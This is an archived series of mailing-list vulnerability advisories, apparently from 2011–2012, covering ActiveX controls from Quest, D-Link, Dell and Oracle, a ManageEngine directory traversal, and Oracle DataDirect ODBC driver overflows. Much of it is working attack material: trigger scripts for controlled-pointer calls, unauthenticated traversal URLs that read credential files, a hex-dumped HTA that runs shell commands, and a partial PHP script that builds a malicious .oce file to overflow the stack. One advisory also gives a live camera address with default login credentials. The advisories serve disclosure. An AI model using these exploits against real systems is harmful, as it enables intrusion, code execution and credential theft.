Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution

2012-03-28 Thread nospam
Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll 
Uninitialized Pointer Remote Code Execution 


homepage: http://www.quest.com/intrust/

description: InTrust securely collects, stores, reports and 
alerts on event log data from Windows, Unix and Linux systems, 
helping you comply with external regulations, internal policies 
and security best practices.


download url of a test version:
http://www.quest.com/downloads/

file tested: Quest_InTrust---Full-Package_104.zip


Background:

The mentioned product installs an ActiveX control
with the following settings:

binary path: C:\PROGRA~1\COMMON~1\SOFTWA~1\ANNOTA~1.DLL
CLSID: {EF600D71-358F-11D1-8FD4-00AA00BD091C}
ProgID: AnnotationX.AnnList.1
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True

According to the IObjectSafety interface it is
safe for scripting and safe for initialization, so 
Internet Explorer will allow scripting of this control
from remote.

Vulnerability:

By invoking the Add() method it is
possible to call inside a memory region of choice
set by the attacker through e.g. heap spray or other
techniques.

Example code:

<object classid='clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C' id='obj' />
</object>
<script>
obj.Add(0x76767676,1);
</script>

..
eax=76767676 ebx=4401e51c ecx=01f85340 edx= esi=01f85340 edi=0001
eip=4400ae62 esp=015fd134 ebp=015fd140 iopl=0 nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=00010202
ANNOTA_1+0xae62:
4400ae62 ff1485504a0244  calldword ptr ANNOTA_1!DllUnregisterServer+0x19235 
(44024a50)[eax*4] ds:0023:1ddc2428=
..

You are in control of eax: fully exploitable.
As attachment, proof of concept code. 

original url: http://retrogod.altervista.org/9sg_quest_adv.htm

poc: http://retrogod.altervista.org/9sg_quest_poc.htm


D-Link SecuriCam DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll lstrcpyW Remote Buffer Overflow Vulnerability

2012-03-28 Thread nospam
D-Link SecuriCam DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll 
lstrcpyW Remote Buffer Overflow Vulnerability

tested against: Microsoft Windows Server 2003 r2 sp2
Internet Explorer 7/8

Live demo: http://203.125.227.70/eng/index.cgi
username: dlink
password: dlink

product homepage: http://www.d-link.com/products/?pid=771

product description:
The DCS-5605 is a high performance camera for professional surveillance 
and remote monitoring. This network camera features motorized pan, 
tilt, and optical/digital zoom for ultimate versatility. The 10x optical 
zoom lens delivers the level of detail necessary to identify faces, license 
plate numbers, and other important details that are difficult to 
clearly distinguish using digital zoom alone

background:
When browsing the device web interface, the user
is asked to install an ActiveX control to stream
video content. This control has the following settings:

Description: Camera Stream Client Control
File version: 1.0.0.4519
Binary path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
ProgID: DcsCliCtrl.DCSStrmControl.1
GUID: {721700FE-7F0E-49C5-BDED-CA92B7CB1245}
Implements IObjectSafety: Yes
Safe For Scripting (IObjectSafety): True
Safe For Initialization (IObjectSafety): True


Vulnerability:
the ActiveX control exposes the SelectDirectory()
method which supports one optional argument.
See typelib:
..
/* DISPID=22 */
/* VT_BSTR [8] */
function SelectDirectory(
/* VT_VARIANT [12] [in] */ $varDefPath 
)
{
/* method SelectDirectory */
}
..

This method suffers from a stack based buffer overflow vulnerability
because of an unsafe lstrcpyW() call inside DcsCliCtrl.dll:


..
100712E0   81EC 3404sub esp,434
100712E6   A1 2C841010  mov eax,dword ptr ds:[1010842C]
100712EB   33C4 xor eax,esp
100712ED   898424 3004  mov dword ptr ss:[esp+430],eax
100712F4   53   push ebx
100712F5   8B9C24 4804  mov ebx,dword ptr ss:[esp+448]
100712FC   55   push ebp
100712FD   8BAC24 4004  mov ebp,dword ptr ss:[esp+440]
10071304   56   push esi
10071305   8BB424 4C04  mov esi,dword ptr ss:[esp+44C]
1007130C   57   push edi
1007130D   8BBC24 4C04  mov edi,dword ptr ss:[esp+44C]
10071314   68 0802  push 208
10071319   8D4424 34lea eax,dword ptr ss:[esp+34]
1007131D   6A 00push 0
1007131F   50   push eax
10071320   E8 0BC40300  call DcsCliCt.100AD730
10071325   83C4 0C  add esp,0C
10071328   85F6 test esi,esi
1007132A   74 0Cje short DcsCliCt.10071338
1007132C   56   push esi
1007132D   8D4C24 34lea ecx,dword ptr ss:[esp+34]
10071331   51   push ecx
10071332   FF15 D4D20C10call dword ptr ds:[KERNEL32.lstrcpyW] ; 
kernel32.lstrcpyW -
..

An attacker could entice a remote user to browse a web
page to gain control of the victim browser, by passing an overlong string to 
the mentioned method and overwriting critical structures (SEH).

As attachment proof of concept code.

Note, to reproduce the wanted crash:
when the SelectDirectory() method is called the
user is asked to select a destination folder for the stream recorder.
To set EIP to 0x0c0c0c0c select a folder of choice, then proceed.
When clicking Cancel you get a useless crash; however it could be
possible that by modifying the poc you will have EIP overwritten as well.


I think that it is also possible that other products might carry this dll,
I could post an update if I find more.

Additional note:

0:029 lm -vm DcsCliCtrl
start    end        module name
0845 0859e000   DcsCliCtrl   (deferred) 
Image path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
Image name: DcsCliCtrl.dll
Timestamp:Thu Aug 19 08:48:47 2010 (4C6CD3CF)
CheckSum: 001325EC
ImageSize:0014E000
File version: 1.0.0.4519
Product version:  1.0.0.1
File flags:   0 (Mask 3F)
File OS:  4 Unknown Win32
File type:2.0 Dll
File date:.
Translations: 0409.04e4
ProductName:  Camera Streaming Client
InternalName: DcsCliCtrl.dll
OriginalFilename: DcsCliCtrl.dll
ProductVersion:   1.0.0.1
FileVersion:  1.0.0.4519
FileDescription:  Camera Stream Client Control
LegalCopyright:   Copyright: (c) All rights reserved.

original url: http://retrogod.altervista.org/9sg_dlink_adv.htm
poc: http://retrogod.altervista.org/9sg_dlink_poc.htm


Dell Webcam Software Bundled ActiveX Control CrazyTalk4Native.dll sprintf Remote Buffer Overflow Vulnerability

2012-03-19 Thread nospam
Dell Webcam Software Bundled ActiveX Control CrazyTalk4Native.dll 
sprintf Remote Buffer Overflow Vulnerability

Tested against: Microsoft Windows Vista SP2
Microsoft Windows XP SP3
Microsoft Windows 2003 R2 SP2
Internet Explorer 7/8/9

download url of a test version: 
http://search.dell.com/results.aspx?c=usl=ens=gencat=supk=Dell+SX2210+monitorrpp=12p=1subcat=dydrf=allnk=fsort=Kira=False~srd=Falseipsys=Falseadvsrch=False~ck=anav

file tested: Dell_SX2210-Monitor_Webcam SW RC1.1_ R230103.exe


This package contains the Dell Webcam Central software
developed by Creative Technologies for Dell.


info: 
http://dell-webcam-central.software.informer.com/
http://live-cam-avatar-creator.software.informer.com/
http://www.google.com/search?channel=shl=enbiw=1024bih=581q=13149882-F480-4F6B-8C6A-0764F75B99ED
http://www.google.com/search?sclient=psy-abhl=enbiw=1024bih=581source=hpq=crazytalk4.ocxbtnG=Search
http://www.google.com/search?sclient=psy-abhl=enbiw=1024bih=581source=hpq=CrazyTalk4Native.dllbtnG=Search
http://dell-webcam-central.software.informer.com/users/
http://live-cam-avatar-creator.software.informer.com/users/

I think this is a very common ActiveX, probably bundled with Dell Notebooks.


Background:
The mentioned software carries a third party ActiveX Control
with the following settings.

Binary path: C:\Program Files\Common Files\Reallusion\CT Player\crazytalk4.ocx
ProgID: CRAZYTALK4.CrazyTalk4Ctrl.1
CLSID: {13149882-F480-4F6B-8C6A-0764F75B99ED}
Safe for Scripting (Registry): True
Safe for Initialization (Registry): True

This control is marked safe for scripting and safe for initialization,
so Internet Explorer will allow scripting of this control from remote.

Vulnerability:

The 'BackImage', 'ScriptName', 'ModelName' and 'SRC' properties
can be used to trigger a buffer overflow condition.
The crazytalk4.ocx ActiveX control will load the close CrazyTalk4Native.dll
library and, while constructing a local file path, will call sprintf()
with an insufficient size.


Call stack of main thread
AddressStack  Procedure / arguments 
Called from 
  Frame
0012EE24   023D4FAB   msvcrt.sprintf
CrazyTal.023D4FA5
0012EE28   0012F180 s = 0012F180
0012EE2C   023F431C format = %s%s%s
0012EE30   042A2D6C %s = C:\DOCUME~1\Admin\LOCALS~1\Temp\RLTMP\~RW463\
0012EE34   0012EF5C %s = 
aa
0012EE38   0012EE58 %s = 
0012F164   023D601D   CrazyTal.023D4F20 

code, CrazyTalk4Native.dll :
..
023D4F80   85C0             test eax,eax
023D4F82   74 38            je short CrazyTal.023D4FBC
023D4F84   8B9C24 2C030000  mov ebx,dword ptr ss:[esp+32C]
023D4F8B   8D4424 1C        lea eax,dword ptr ss:[esp+1C]
023D4F8F   8D8C24 20010000  lea ecx,dword ptr ss:[esp+120]
023D4F96   50               push eax
023D4F97   81C6 443B0000    add esi,3B44
023D4F9D   51               push ecx
023D4F9E   56               push esi
023D4F9F   68 1C433F02      push CrazyTal.023F431C                 ; ASCII "%s%s%s"
023D4FA4   53               push ebx
023D4FA5   FF15 E4F33E02    call dword ptr ds:[<&MSVCRT.sprintf>]  ; msvcrt.sprintf
..

As attachment, proof of concept code which overwrites EIP and SEH.


Note:

0:008> lm -vm CrazyTalk4Native
start    end        module name
021c0000 0220b000   CrazyTalk4Native   (deferred)
Image path: C:\PROGRA~1\COMMON~1\REALLU~1\CTPLAY~1\CrazyTalk4Native.dll
Image name: CrazyTalk4Native.dll
Timestamp:Thu May 17 12:13:42 2007 (464C2AD6)
CheckSum: 00048AB2
ImageSize:0004B000
File version: 4.5.815.1
Product version:  4.0.0.1
File flags:   0 (Mask 3F)
File OS:  4 Unknown Win32
File type:2.0 Dll
File date:        00000000.00000000
Translations: 0409.04b0
CompanyName:  C3D
ProductName:  CrazyTalk4 ActiveX Control Module
InternalName: CrazyTalk4
OriginalFilename: CrazyTalk4.OCX
ProductVersion:   4, 0, 0, 1
FileVersion:  4, 5, 815, 1
PrivateBuild: 4, 5, 815, 1
SpecialBuild: 4, 5, 815, 1
FileDescription:  CrazyTalk4 Native Control Module
LegalCopyright:   Copyright (C) 2005
LegalTrademarks:  Copyright (C) 2005
Comments: Copyright (C) 2005

proof of concept: http://retrogod.altervista.org/9sg_dell_poc_nodep.html


ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet Unauthenticated Remote Directory Traversal Vulnerability

2012-03-19 Thread nospam
ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet 
Unauthenticated 
Remote Directory Traversal Vulnerability

product homepage: http://www.manageengine.com/products/device-expert/
file tested: ManageEngine_DeviceExpert.exe
tested against: Microsoft Windows Server 2003 r2 sp2

Description:
DeviceExpert is a web–based, multi vendor network change, configuration and 
compliance management (NCCCM) solution for switches, routers, firewalls and 
other network devices. Trusted by thousands of network administrators 
around the world, DeviceExpert helps automate and take total control 
of the entire life cycle of device configuration management.
[..]

Background:
The mentioned product installs a Java application server
which listens by default on port 6060 (https) for incoming
connections.

Vulnerability:
Without prior authentication, it is possible to invoke the
ScheduleResultViewer servlet to disclose every file
on the target system. This can be done through the
FileName argument, which suffers from a directory traversal
vulnerability.

examples:

https://[host]:6060/scheduleresult.de/?FileName=conf\Authentication\auth-conf.xml
https://[host]:6060/scheduleresult.de/?FileName=..\..\..\..\..\..\..\..\..\..\boot.ini


auth-conf.xml stores the authentication credentials to the
administrative interface (username, hashed password and a salt).
It is also possible to back up the MySQL database tables by cycling
through subfolders.
These tables can also contain usernames and passwords of
the configured devices; remember the software's functionality:
it supports devices from multiple vendors, from the following list:

..
Cisco, HP, Nortel, Juniper, Force10, 3Com, D-link, Foundry, Dell, Aruba, 
Extreme, ADTRAN, Enterasys, Huawei, Blue Coat, Proxim, NetScreen, NETGEAR, 
FortiNet, ALAXALA, Brocade, Radware, DAX, H3C, Yamaha, Vanguard, Allied 
Telesis, Alcatel, Fujitsu, Motorola, Acme Packet, Watch Guard, Canoga Perkins
..

Explanation:

look at the web.xml located inside 
C:\ManageEngine\DeviceExpert\webapps\ncm\WEB-INF\ :

..
<servlet>
    <servlet-name>ScheduleResultViewer</servlet-name>
    <servlet-class>com.adventnet.ncm.client.schedule.ScheduleResultViewerServlet</servlet-class>
</servlet>

<servlet-mapping>
    <servlet-name>ScheduleResultViewer</servlet-name>
    <url-pattern>/scheduleresult.de/*</url-pattern>
</servlet-mapping>
..

now decompile ScheduleResultViewerServlet.class:


..
package com.adventnet.ncm.client.schedule;

import com.adventnet.ncm.util.NCMServerUtil;
import java.io.*;
import java.util.logging.Level;
import java.util.logging.Logger;
import javax.servlet.ServletException;
import javax.servlet.http.*;

public class ScheduleResultViewerServlet extends HttpServlet
{

    public ScheduleResultViewerServlet()
    {
        logger = Logger.getLogger(com/adventnet/ncm/client/schedule/ScheduleResultViewerServlet.getName());
    }

    public void service(HttpServletRequest request, HttpServletResponse response)
        throws ServletException, IOException
    {
        FileInputStream in;
        OutputStream out;
        in = null;
        out = null;
        try
        {
            String fileName = request.getParameter("FileName"); //<--
            if(fileName.endsWith(".pdf"))
            {
                response.reset();
                response.setContentType("application/pdf;charset=utf-8");
            } else
            {
                response.setContentType("text/html;charset=utf-8");
            }
            File file = new File((new StringBuilder()).append(NCMServerUtil.SERVER_HOME).append(FS).append(fileName).toString()); //<---
            response.setContentLength((int)file.length());
            in = new FileInputStream(file);
            out = response.getOutputStream(); //<-
            byte buf[] = new byte[1024];
            for(int count = 0; (count = in.read(buf)) >= 0;)
                out.write(buf, 0, count); //<-

        }
        catch(Exception ex)
        {
            logger.log(Level.SEVERE, "Exception while processing request in ScheduleResultViewerServlet", ex);
            throw new ServletException(ex);
        }
        if(in != null)
            in.close();
        if(out != null)
            out.close();
        break MISSING_BLOCK_LABEL_221;
        Exception exception;
        exception;
        if(in != null)
            in.close();
        if(out != null)
            out.close();
        throw exception;
    }

    Logger logger;
    private static final String FS = System.getProperty("file.separator");

}

'FileName' is taken from the request parameter without sanitization, then
is passed to the File object. The file content is shown to the remote user.


I think this is a huge vulnerability because this could open the path to
the equipments of an entire network.

As attachment, proof of concept code, which backs up the underlying MySQL
database. You could also choose 

Oracle Hyperion Financial Management TList6 ActiveX Control Remote Code Execution Vulnerability

2011-11-01 Thread nospam
Oracle Hyperion Financial Management TList6 ActiveX Control Remote Code 
Execution Vulnerability

tested against: Internet Explorer 8
Microsoft Windows Server 2003 r2 sp2

download url:
http://www.oracle.com/technetwork/middleware/epm/downloads/index.html

files tested:
SystemInstaller-11121-win32.zip
FoundationServices-11121-win32-Part1.zip
FoundationServices-11121-win32-Part2.zip
FoundationServices-11121-win32-Part3.zip
FoundationServices-11121-win32-Part4.zip
FoundationServices-11121-Part5.zip
FoundationServices-11121-Part6.zip
FoundationServices-11121-Part7.zip
StaticContent-11121.zip
RandAFoundation-11121.zip
EPM_Architect-11121.zip
HyperionFinancialManagement-11121.zip

Background:

the mentioned program installs an ActiveX control with the following
settings:

Binary Path: C:\WINDOWS\system32\TList6.ocx
ProgID: TList.TList.6
CLSID: {65996200-3B87-11D4-A21F-00E029189826}
Safe for Initialization (Registry): True
Safe for Scripting (Registry): True

This control is marked safe for scripting and safe for initialization, so
Internet Explorer will allow scripting of this control.


Vulnerability:

The mentioned class contains the vulnerable SaveData() method, see typelib:

..
/* DISPID=167 */
/* VT_I2 [2] */
function SaveData(
/* VT_BSTR [8]  */ $lpszFileName 
)
{
}
..

which allows creating / overwriting files with arbitrary extensions
inside arbitrary locations, e.g. automatic startup folders. By manipulating
e.g. the Caption property, it is possible to create a valid application
with .hta extension.

The resulting file will look like this:

0000  00 62 99 65 87 3b d4 11  a2 1f 00 e0 29 18 98 26   .b™e‡;Ô. ¢..à).˜&
0010  09 00 06 00 ac 14 00 00  ac 14 00 00 e4 00 00 00   ....¬... ¬...ä...
0020  00 03 52 e3 0b 91 8f ce  11 9d e3 00 aa 00 4b b8   ..Rã.‘Î .ã.ª.K¸
0030  51 01 00 00 00 90 01 c0  d4 01 00 0f 54 69 6d 65   Q.....À Ô...Time
0040  73 20 4e 65 77 20 52 6f  6d 61 6e 01 00 01 01 00   s New Ro man.....
0050  08 00 00 80 05 00 00 80  0e 00 00 80 0d 00 00 80   ...€...€ ...€...€
0060  2c 01 00 00 e1 00 00 00  e1 00 00 00 f1 ff ff ff   ,...á... á...ñÿÿÿ
0070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ........ ........
0080  00 00 00 00 00 00 00 00  01 5c 61 3e 3e 3e 3e 3e   ........ .\a>>>>>
0090  3e 3e 3e 3e 3e 3e 3e 3e  3e 3e 3e 3e 3c 53 43 52   >>>>>>>> >>>><SCR
00a0  49 50 54 3e 20 76 61 72  20 78 3d 6e 65 77 20 41   IPT> var  x=new A
00b0  63 74 69 76 65 58 4f 62  6a 65 63 74 28 22 57 53   ctiveXOb ject("WS
00c0  63 72 69 70 74 2e 53 68  65 6c 6c 22 29 3b 20 78   cript.Sh ell"); x
00d0  2e 45 78 65 63 28 22 43  41 4c 43 2e 45 58 45 22   .Exec("C ALC.EXE"
00e0  29 3b 20 3c 2f 53 43 52  49 50 54 3e 00 01 01 01   ); </SCR IPT>....
00f0  03 00 ff ff ff ff ff ff  ff ff 00 01 00 01 00 00   ..ÿÿÿÿÿÿ ÿÿ......
0100  00 00 00 00 00 00 00 00  00 00 01 00 01 00 00 00   ........ ........
0110  01 00 00 00 00 00 03 00  01 00 00 00 ff 00 00 00   ........ ....ÿ...
0120  00 00 00 08 00 00 80 01  00 00 00 00 00 00 00 00   ......€. ........
0130  00 17 00 00 80 18 00 00  80 00 00 00 00 01 00 1a   ....€... €.......
0140  62 99 65 87 3b d4 11 a2  1f 00 e0 29 18 98 26 44   b™e‡;Ô.¢ ..à).˜&D
0150  55 02 00 00 00 12 00 06  00 0b 00 02 00 00 00 00   U....... ........
0160  00 00 04 00 03 00 00 60  ab 4e 06 10 00 00 00 5f   .......` «N....._
0170  5f 4f 62 73 6f 6c 65 74  65 56 61 6c 75 65 00 00   _Obsolet eValue..
0180  00 00 00 00 00 00 00 00  60 ab 4e 06 00 00 00 00   ........ `«N.....
0190  01 4d 4b 10 00 00 00 00  00 01 00 00 00 02 00 00   .MK..... ........
01a0  00 03 00 00 00 04 00 00  00 05 00 00 00 06 00 00   ........ ........
01b0  00 07 00 00 00 08 00 00  00 09 00 00 00 0a 00 00   ........ ........
01c0  00 0b 00 00 00 0c 00 00  00 0d 00 00 00 0e 00 00   ........ ........
01d0  00 0f 00 00 00 00 00 ff  00 00 ff ff ff 00 00 00   .......ÿ ..ÿÿÿ...
01e0  ff 00 00 00 00 00 00 05  00 00 00 02 00 00 00 00   ÿ....... ........
01f0  00 01 00 00 c0 c0 c0 22  00 00 08 00 00 00 09 00   ....ÀÀÀ" ........
0200  01 00 00 80 bf ff 31 00  00 00 8a e3 aa 2b 84 ee   ...€¿ÿ1. ..Šãª+„î
0210  e5 a0 2b 84 a8 ac a0 0c  00 00 00 35 35 32 58 58   å +„¨¬ . ...552XX
0220  58 58 58 44 45 4d 4f 08  00 00 00 4a 6f 68 6e 20   XXXDEMO. ...John 
0230  44 6f 65 1e 00 01 00 00  00 00 40 00 00 ff ff ff   Doe..... ..@..ÿÿÿ
0240  00 90 01 00 00 02 00 d7  00 00 00 44 55 06 00 00   ......× ...DU...
0250  00 12 00 06 00 0b 00 06  00 00 00 f8 8f 50 04 10   ........ ...øP..
0260  00 00 00 5f 5f 49 6e 6e  65 72 50 69 63 41 6c 69   ...__Inn erPicAli
0270  67 6e 00 03 00 05 00 00  00 00 10 58 66 04 13 00   gn...... ...Xf...
0280  00 00 5f 5f 49 6e 6e 65  72 42 6f 72 64 65 72 43   ..__Inne rBorderC
0290  6f 6c 6f 72 00 03 00 00  00 00 00 00 20 b5 56 08   olor.... .... µV.
02a0  13 00 00 00 5f 5f 49 6e  6e 65 72 42 6f 72 64 65   ....__In nerBorde
02b0  72 53 74 79 6c 65 00 03  00 00 00 00 00 00 30 f4   rStyle.. ......0ô
02c0  60 08 11 00 00 00 5f 5f  49 6e 6e 65 72 42 61 63   `.....__ InnerBac

Oracle DataDirect ODBC Drivers HOST Attribute arsqls24.dll Stack Based Buffer Overflow PoC (*.oce)

2011-10-31 Thread nospam
<?php
/*
Oracle DataDirect ODBC Drivers HOST Attribute arsqls24.dll Stack Based Buffer 
Overflow PoC (*.oce)
by rgod

found a local vector for this:
http://retrogod.altervista.org/9sg_oracle_datadirect.htm
http://www.exploit-db.com/exploits/18007/

This poc will create a suntzu.oce file 
which should work against Hyperion Interactive Reporting Studio
which is delivered with Oracle Hyperion Suite.
When clicked a login box appears, on clicking OK an error message 
also appears then error then... boom!

description for .oce :
Interactive Reporting database connection file

file association:
C:\Oracle\Middleware3\EPMSystem11R1\products\biplus\\bin\\brioqry.exe %1

crash dump, eip and seh overwritten, unicode expanded, 
I suppose one should be able to deal with it :

(208.152c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000008b ebx=00000000 ecx=0e752eb8 edx=0f490000 esi=0e6b3d60 edi=0012a338
eip=00410043 esp=0012a2d8 ebp=0012a2ec iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010286
brioqry+0x10043:
00410043 0152ff          add     dword ptr [edx-1],edx ds:0023:0f48ffff=????????
0:000> g
(208.152c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000008b ebx=00000000 ecx=00410041 edx=7c8285f6 esi=00000000 edi=00000000
eip=00410043 esp=00129f10 ebp=00129f30 iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010286
brioqry+0x10043:
00410043 0152ff          add     dword ptr [edx-1],edx ds:0023:7c8285f5=244c8b00
*/

function _x($x){
  global $buff;
  list($x) = array_values(unpack('V', $x));
  $x = $x + strlen($buff);
  $x = pack('V',$x);
  return $x;
}

$buff = "mydatabase.com".
str_repeat("\x20",16).  //cosmetics, no ... inside the login box
str_repeat("\x41",4000);
//$dsn="DRIVER=DataDirect 6.0 Greenplum Wire Protocol;HOST=;IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null;;";
//$dsn="DRIVER=DataDirect 6.0 MySQL Wire Protocol;HOST=;IP=127.0.0.1;PORT=9;DB=DATA;UID=sa;PWD=null;";
$dsn="DRIVER=DataDirect 6.0 PostgreSQL Wire Protocol;HOST=;UID=system;PWD=X;;";
while (!(strlen($dsn)==166)){ //fill the gap
  $dsn.="\x20";
}
$dsn=str_replace("HOST=;","HOST=".$buff.";",$dsn);
$dump=
"#BRIF\x20BIN001".
"\x00\x00\x00\x00".
_x("\x7b\x07\x00\x00"). //header length, increase counter
"\x37\x00\x00\x00". //path length
"D:\\Documents\x20and\x20Settings\\Admin\\Desktop\\Predefinito.oce".
"\x01\x00\x01\x00".
"\x00\x00\x07\x00".
"\x00\x00\x0a\x00".
"\x00\x00".
_x("\xa6\x00\x00\x00"). //dsn length
$dsn.
"\x00\x00\x00\x00".
"\x00\x00\x00\x00".
"\x04\x00\x00\x00".
"True".
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x01\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x04\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\r\x00\x00\x00".
"ColItem.Table".
"\x01\x00".
"\x00\x00\x04\x00\x00\x00\x12\x00\x00\x00".
"ColItem.TableAlias".
"\x01\x00\x00\x00\x10\x00".
"\x00\x00\r\x00\x00\x00".
"ColItem.Owner".
"\x01\x00\x00\x00\x1c\x00\x00\x00\x0c\x00\x00".
"\x00".
"ColItem.Type".
"\x01\x00\x00\x00(\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00".
"Source".
"\x01\x00\x00\x00\x05\x00\x00\x004\x00\x00\x00\x05\x00\x00\x00".
"Where".
"\x01".
"\x00\x00\x00\x05\x00\x00\x008\x00\x00\x00\x07\x00\x00\x00".
"OrderBy".
"\x01\x00".
"\x00\x00\x05\x00\x00\x00\x00\x00\x00|\x00\x00\x00\x04\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x09\x00\x00\x00\x0c\x00\x00\x00ColItem.Name\x01\x00\x00\x00".
"\x04\x00\x00\x00\x10\x00\x00\x00".
"ColItem.ColAlias".
"\x01\x00\x00\x00\x10\x00\x00\x00".
"\x0e\x00\x00\x00".
"ColItem.ColNum".
"\x01\x00\x00\x00\x1c\x00\x00\x00\x0f\x00\x00\x00".
"ColItem.ColType".
"\x01\x00\x00\x00(\x00\x00\x00\x10\x00\x00\x00".
"ColItem.NumBytes".
"\x01\x00\x00\x004\x00".
"\x00\x00\x0e\x00\x00\x00".
"ColItem.Places".
"\x01\x00\x00\x00@\x00\x00\x00\x0e\x00\x00".
"\x00".
"ColItem.Digits".
"\x01\x00\x00\x00L\x00\x00\x00\r\x00\x00\x00".
"ColItem.Nulls".
"\x01\x00\x00\x00X\x00".
"\x00\x00\x12\x00\x00\x00".
"ColItem.NativeType".

Oracle DataDirect Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflow Vulnerability

2011-10-20 Thread nospam
Oracle DataDirect Multiple Native Wire Protocol ODBC Drivers HOST Attribute 
Stack Based Buffer Overflow Vulnerability

tested against: Microsoft Windows 2k3 r2 sp2
Oracle Hyperion Performance Management and BI (v11.1.2.1.0)

download url of the Oracle Hyperion suite:
http://www.oracle.com/technetwork/middleware/epm/downloads/index.html

files tested:
SystemInstaller-11121-win32.zip
FoundationServices-11121-win32-Part1.zip
FoundationServices-11121-win32-Part2.zip
FoundationServices-11121-win32-Part3.zip
FoundationServices-11121-win32-Part4.zip
FoundationServices-11121-Part5.zip
FoundationServices-11121-Part6.zip
FoundationServices-11121-Part7.zip
StaticContent-11121.zip
RandAFoundation-11121.zip
EPM_Architect-11121.zip

Vulnerability:

The mentioned product installs various drivers to allow
the software to get information from ODBC data sources.
Some of them are vulnerable to a remote stack based buffer
overflow which can be triggered by specifying an overlong
HOST attribute inside the connection string. The software
tries to do a Unicode/ASCII conversion.
In doing this, the stack is completely smashed,
allowing redirection of the execution flow to a user supplied buffer.

Analysis for (*) and errata corrige, too many nights awake:
When receiving the attribute, arsqls24.dll
does a Unicode/ASCII conversion; this fragment of code
counts the number of bytes needed and stores it in eax
..
01D45C10   83C1 02          add ecx,2
01D45C13   83C0 01          add eax,1
01D45C16   66:8339 00       cmp word ptr ds:[ecx],0
01D45C1A  ^75 F4            jnz short ARSQLS24.01D45C10
..
the next operation is a copy loop which moves the needed
bytes to a memory region pointed to by ecx, trusting the
eax counter.
..
01D48C36   8A16             mov dl,byte ptr ds:[esi]
01D48C38   83E8 01          sub eax,1
01D48C3B   8811             mov byte ptr ds:[ecx],dl
01D48C3D   83C1 01          add ecx,1
01D48C40   83C6 02          add esi,2
01D48C43   85C0             test eax,eax
01D48C45  ^75 EF            jnz short ARSQLS24.01D48C36
..
The memory region pointed to by ecx is adjacent to critical
structures (stack pointers), so when the HOST attribute
is an overlong string the stack is partially overwritten
with user supplied values. The result, after a few steps:

EAX 00000000
ECX 00000003
EDX 02B52E88
EBX 0013C720 ASCII "AAAA..."
ESP 0013C720 ASCII "AAAA..."
EBP 0013D1A4
ESI 02B56FF8
EDI 00000001
EIP 41414141
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDF000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr WSAHOST_NOT_FOUND (00002AF9)
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
MM0 0000 0000 0000 0000
MM1 0000 0000 0000 0000
MM2 0000 0000 0000 0000
MM3 0000 0000 0000 0000
MM4 0000 0000 0000 0000
MM5 0000 0000 0000 0000
MM6 8000 0000 0000 0000
MM7 FEE0 0000 0000 0000

poc:

The underlying operating system contains the ADODB Connection
ActiveX control which is marked safe for initialization
and safe for scripting (implements the IObjectSafety interface),
which could allow a remote attacker to specify the
mentioned connection string.

The IE security settings do not allow opening a connection
from another domain, but this can be used in conjunction
with an XSS vulnerability, connection string pollution or
SQL injection vulnerabilities, or through specific configuration
files. Note also that I am mentioning the ADODB object for pure
convenience: when installed, the ODBC drivers are available
systemwide, so this is a good basis for remote privilege elevations
of many kinds.

Note that Internet Explorer does not crash when trying to
